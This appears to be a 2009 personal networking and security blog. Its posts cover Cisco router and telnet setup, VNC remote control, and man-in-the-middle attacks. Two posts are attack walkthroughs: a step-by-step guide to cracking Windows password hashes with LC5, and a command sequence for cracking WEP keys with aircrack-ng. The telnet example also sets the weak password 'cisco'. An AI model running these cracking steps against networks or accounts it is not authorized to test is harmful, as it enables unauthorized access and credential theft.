Wednesday, August 12, 2009

Crack Windows Password With LC5 ( cont. )

How to crack Windows local password?

  • After complete installation, run LC5 at start menu.
  • A wizard display & just click Next.









  • Select "Retrieve from a remote machine" to choose where to get the encryption password.












  • Then select "Strong Password Audit" to choose auditing method that you want to use.











  • This wizard show how you want to view your reporting style.













  • Click Finish to finishing you wizard setup.
















  • Select Local Machine to get Windows password for user that exist in the Windows. Click Ok after that.








  • Finally, Windows user's password will be reveal to you.

Crack Windows Password With LC5

LC 5 is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.

Using multiple assessment methods, LC 5 reduces security risk by helping administrators to:
  • Identify and remediate security vulnerabilities that result from the use of weak or easily guessed passwords
  • Recover Windows and Unix account passwords to access user and administrator accounts whose passwords are lost or to streamline migration of users to another authentication system
  • Rapidly process accounts using pre-computed password tables* that contain trillions of passwords

How it works:

Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute.

Eventually the correct password will be sent and then displayed to the screen.

Good intentions:

  • System administrators can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
  • LC5 can be used to access computers of users who forget passwords.
  • In companies, it can be used to access computers of employees who have left the company.

Bad intentions:

  • Hackers can use LC5 to sniff passwords over networks.
  • Hackers can install this application onto a primary domain controller and steal hundreds of passwords within minutes.

Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied.

Download LC5 (v5.04):

Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.

Tuesday, August 11, 2009

Router ( cont. )

Links for Cisco Router Command, settings & informations.
  1. ccnalab
  2. itknowledgeexchange
  3. opennet
  4. swcp
*Click here to download Cisco Command Doc

Router ( cont. ) - Telnet

Definition

Telnet (teletype network) is a network protocol used on the Internet or local area networks to provide a bidirectional interactive communications facility. Typically, telnet provides access to a command-line interface on a remote host via a virtual terminal connection which consists of an 8-bit byte oriented data connection over the Transmission Control Protocol (TCP). User data is interspersed in-band with TELNET control information. The term telnet may also refer to the software that implements the client part of the protocol. Telnet client applications are available for virtually all computer platforms. Most network equipment and operating system with a TCP/IP stack support a Telnet service for remote configuration (including systems based on Windows NT). Because of security issues with Telnet, its use has waned in favor of SSH for remote access.

For more info, please visit Wikipedia.

**************************************************************

Configure Telnet

To use Telnet, you must 1st set the router.
Click here to see how to set 2 router.

After set all router, now you need to setup for Telnet.

Router>enable
Router#conf t
Router(config)#line vty 0 ? // to check how many lines we have

Router(config)#line vty 0 5
Router(config-line)#
Router(config-line)#password cisco // cisco is the password

Telnet Using Another Router

Router>enable
Router#telnet (ip addr)

Monday, August 10, 2009

Router ( cont. ) - Basic Configure Cisco Router

Using 1 Router

Router>enable
Router#config terminal

********Setup Hostname********
Router(config)#hostname Router_A

********Start Setup Fast Ethernet 0/0 Interface********
Router_A(config)#int fa0/0
Router_A(config-if)#ip addr 192.x.x.x 255.255.255.0
Router_A(config-if)#no shutdown
Router_A(config-if)#exit
Router_A(config)#exit

********Start Setup Fast Ethernet 0/1 Interface********
Router_A(config)#int fa0/1
Router_A(config-if)#ip addr 192.x.x.x 255.255.255.0
Router_A(config-if)#no shutdown
Router_A(config-if)#exit
Router_A(config)#exit

********Start Setup Routing Protocol using RIP********
Router_A(config)#router rip
Router_A(config-router)#network 192.x.x.x
Router_A(config-router)#network 192.x.x.x

*Note : Each IP for the gateway that been setup are not in the same segment.


Using 2 Routers


1st Router

Router>enable
Router#config terminal

********Setup Hostname********
Router(config)#hostname Router_A

********Start Setup Serial 0/0 Interface with DCE connection********
Router_A(config)#int s0/0
Router_A(config-if)#ip addr 10.x.x.x 255.255.255.0
Router_A(config-if)#clockrate 64000
Router_A(config-if)#no shutdown
Router_A(config-if)#exit
Router_A(config)#exit

********Start Setup Fast Ethernet 0/0 Interface********
Router_A(config)#int fa0/0
Router_A(config-if)#ip addr 192.x.x.x 255.255.255.0
Router_A(config-if)#no shutdown
Router_A(config-if)#exit
Router_A(config)#exit

********Start Setup Routing Protocol using RIP********
Router_A(config)#router rip
Router_A(config-router)#network 192.x.x.x
Router_A(config-router)#network 192.x.x.x

-------------------------------------------------------------------------------------------------------
2nd Router

Router>enable
Router#config terminal

********Setup Hostname********
Router(config)#hostname Router_B

********Start Setup Serial 0/1 Interface with DCE connection********
Router_B(config)#int s0/1
Router_B(config-if)#ip addr 10.x.x.x 255.255.255.0
Router_B(config-if)#clockrate 64000
Router_B(config-if)#no shutdown
Router_B(config-if)#exit
Router_B(config)#exit

********Start Setup Fast Ethernet 0/0 Interface********
Router_B(config)#int fa0/0
Router_B(config-if)#ip addr 192.x.x.x 255.255.255.0
Router_B(config-if)#no shutdown
Router_B(config-if)#exit
Router_B(config)#exit

********Start Setup Routing Protocol using RIP********
Router_B(config)#router rip
Router_B(config-router)#network 192.x.x.x
Router_B(config-router)#network 192.x.x.x

*Note : Each IP for the gateway that been setup are not in the same segment.
*Both router can't use the same serial interface.
*Router rip is a basic protocol to connect 2 router with different segmentation/ip.


Sunday, August 9, 2009

Router ( cont. ) - Routing Protocols

Border Gateway Protocol ( BGP )

The core routing protocol of the Internet. It maintains a table of IP networks or 'prefixes' which designate network reachability among autonomous systems. It is described as a path vector protocol. BGP was created to replace the EGP routing protocol to allow fully decentralized routing in order to allow the removal of the NSFNet Internet backbone network. This allowed the Internet to become a truly decentralized system. etc

Cicco Discovery Protocol ( CDP )

A proprietary layer 2 network protocol developed by Cisco Systems that runs on most Cisco equipment and is used to share information about other directly connected Cisco equipment such as the operating system version and IP address. CDP can also be used for On-Demand Routing (ODR), which is a method of including routing information in CDP announcements so that dynamic routing protocols do not need to be used in simple networks. etc

Connectionless Network Service ( CLNS )

It is an OSI Network Layer service that (unlike CONS) does not require a circuit to be established before data is transmitted. CLNS routes messages to their destinations In an OSI protocol deployment, CLNS would be the service provided by CLNP (Connectionless Network Protocol) and used by TP4 (Transport Protocol Class 4). However CLNP is not used on the Internet, instead its function is provided by IP. etc

Hot Standby Router Protocol ( HSRP )

a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway. The Virtual Router Redundancy Protocol (VRRP) is a standards-based alternative to HSRP. The two technologies are similar in concept, but not compatible. The protocol establishes a framework between network routers in order to achieve default gateway failover if the primary gateway should become inaccessible, in close association with a rapid-converging routing protocol like EIGRP or OSPF. etc

* Note :- There are many more other protocols that had note stated here. You can search it through search engine exist today.


Router

Definition

A router is a networking device whose software and hardware are usually tailored to the tasks of routing and forwarding information. Routers connect two or more logical subnets, which do not necessarily map one-to-one to the physical interfaces of the router.

Routing is the process of selecting paths in a network along which to send network traffic. Routing is performed for many kinds of networks, including the telephone network, electronic data networks (such as the Internet), and transportation networks. This article is concerned primarily with routing in electronic data networks using packet switching technology.

Routing Protocol

A formula used by routers to determine the appropriate path onto which data should be forwarded. The routing protocol also specifies how routers report changes and share information with the other routers in the network that they can reach. A routing protocol allows the network to dynamically adjust to changing conditions, otherwise all routing decisions have to be predetermined and remain static.


Examples of protocols existed :-

  • BGP (Border Gateway Protocol)
  • CDP (Cisco Discovery Protocol)
  • CLNS (Connectionless Network Service)
  • HSRP (Hot Standby Router Protocol)
  • IGRP/EIGRP (Enhanced Interior Gateway Routing Protocol)
  • IP (Internet Protocol)
  • IS-IS (Intermediate System-to-Intermediate System)
  • MPLS (Multiprotocol Label Switching)
  • Multicast
  • NAT (Network Address Translation)
  • OSPF (Open Shortest Path First)
  • QoS (Quality of Service)
  • RIP (Routing Information Protocol)

Thursday, August 6, 2009

UltraVNC Remote Control Software


UltraVNC is a powerful, easy to use and free software that can display the screen of another computer (via internet or network) on your own screen. The program allows you to use your mouse and keyboard to control the other PC remotely. It means that you can work on a remote computer, as if you were sitting in front of it, right from your current location. If you provide computer support, you can quickly access your customer's computers from anywhere in the world and resolve helpdesk issues remotely! With addons like SingleClick your customers don't even have to pre-install software or execute complex procedures to get remote helpdesk support.

This software are same as Real VNC but its much easy to use & its FREE.

Click here to download

VNC Remote Control Software

Its provides remote control software which lets you see and interact with desktop applications across any network. The program allows you to use your mouse and keyboard to control the other PC remotely. It means that you can work on a remote computer, as if you were sitting in front of it, right from your current location. If you provide computer support, you can quickly access your customer's computers from anywhere in the world and resolve helpdesk issues remotely!

Where to download it?
Visit this website to download it. Real VNC Homepage.
Then execute the program to install.

How to use VNC server?
  1. Go to VNC Server ( User-Mode ) program at Start Menu & click on Run VNC Server.
  2. VNC Server will run & appear at system tray.
  3. Right click on the tray icon & select Option. Change the setting you want & click Ok.
  4. Please note to configure the Authentication tab or you won't able to connect into your server.
  5. If you didn't setup authentication password, your server probably been attack by unknown/unwanted user.
  6. In Authentication tab, enable Prompt local user ... so that everytime you or other user need to keyin password to view the server.
  7. You can setup Connections tab for access control which IP address allowed to access.
  8. In Inputs tab, configure which hardware you want to enable remote control.
  9. Close after finish setup.

For more help, please visit Real VNC Free Documentation.
Enjoy...

Monday, August 3, 2009

Sunday, August 2, 2009

Crack WEP using Backtrack 4


Objective :
To list all wireless interface
Command : #iwconfig

Objective : To identify which interface is up (active)
Command : #ifconfig


Objective : To identify what chipset & driver in used
Command : #airmon-ng

Objective : To activate / start the interface
Command : #airmon-ng start wlan0



Objective : To list all available wireless router / switch & client’s mac address
Command : #airodump-ng wlan0


Objective : To select specific Encryption you want to encrypt
Command : #airodump-ng –bssid <Mac Address> -c <channel no.> -w <put file name you desire> <interface>



Objective : To generate traffic
Command : #aireplay-ng -1 0 –a <Mac Address> <interfaces>



Objective : To generate traffic
Command : #aireplay-ng -3 –b <Mac Address> <interfaces>


* Wait for packets more than 30,000.

Attack modes for #aireplay (Numbers can still be used): -
  • deauth count : deauthenticate 1 or all stations (-0)
  • fakeauth delay : fake authentication with AP (-1)
  • interactive : interactive frame selection (-2)
  • arpreplay : standard ARP-request replay (-3)
  • chopchop : decrypt/chopchop WEP packet (-4)
  • fragment : generates valid keystream (-5)
  • Caffe-latte : Caffe-latte attack (-6)
  • cfrag : Client-oriented fragmentation attack (-7)
  • test : injection test (-9)

Objective : To generate traffic
Command : #aircrack-ng <file name>.cap


To download Backtrack, please visit Remote-Exploit.
For more details, please visit Aircrack-ng.


Saturday, August 1, 2009

Man in The Middle Attack ( MiTM / MIM )

Definition

The man-in-the-middle attack (often abbreviated MITM), or bucket-brigade attack, or sometimes Janus attack, is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within a few miles of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).

A man-in-the-middle attack can only be successful when the attacker can impersonate each endpoint to the satisfaction of the other. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, SSL authenticates the server using a mutually trusted certification authority.

For more information, please click link below :-

  1. Wikipedia
  2. Search Security
  3. Wise Geek
  4. Security Focus
  5. owasp

How does the MiTM attack?

Man in the middle attacks are one of the several devices that are used to gain access to proprietary information, such as pass codes, login credentials, and credit card numbers. The process essentially involves establishing a virus that acts as the interface between two points. Neither party in the exchange is aware that the information that is exchanged is intercepted and captured by the intermediate virus.

The concept of a man in the middle attack predates the inception of the personal computer and widespread use of the Internet. Even in earlier days, intelligence operations would employ the idea of establishing a third party who would in effect initiate a dual interface with two other parties. Each of the other two parties would assume they were involved in a direct connection with one another, not realizing that the third party was intercepting, interpreting and then passing on the communication.

Click here to download on how to defend yourself from Man In The Middle Attack.

Click here to download documentation concepts of Man In The Middle Attack.